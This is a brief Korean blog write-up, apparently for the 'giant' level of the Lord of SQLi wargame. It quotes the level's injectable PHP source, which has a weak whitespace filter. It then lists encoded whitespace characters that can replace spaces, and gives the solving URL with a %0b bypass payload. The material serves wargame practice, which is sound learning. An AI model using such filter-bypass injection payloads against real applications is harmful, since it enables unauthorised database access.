<?php
include "./config.php";
login_chk();
dbconnect();
if(strlen($_GET[shit])>1) exit("No Hack ~_~");
if(preg_match('/ |\n|\r|\t/i', $_GET[shit])) exit("HeHe");
$query = "select 1234 from{$_GET[shit]}prob_giant where 1";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysql_fetch_array(mysql_query($query));
if($result[1234]) solve("giant");
highlight_file(__FILE__);
?>
%09 - 탭(\t)
%0a - line feed(\n)
%0d - 캐리지 리턴(\r)
%0b - 수직탭(\v)
%0C - form feed(\f) <- 이건 처음 들어봄. 꿀팁
https://los.eagle-jump.org/giant_9e5c61fc7f0711c680a4bf2553ee60bb.php?shit=%0b
'WEB Hacking > Lord of SQLi' 카테고리의 다른 글
| [los] zombie_assassin (0) | 2018.09.17 |
|---|---|
| [los] assassin (0) | 2018.09.17 |
| [los] bugbear (0) | 2018.09.17 |
| [los] troll (0) | 2018.09.16 |
| [los] vampire (0) | 2018.09.16 |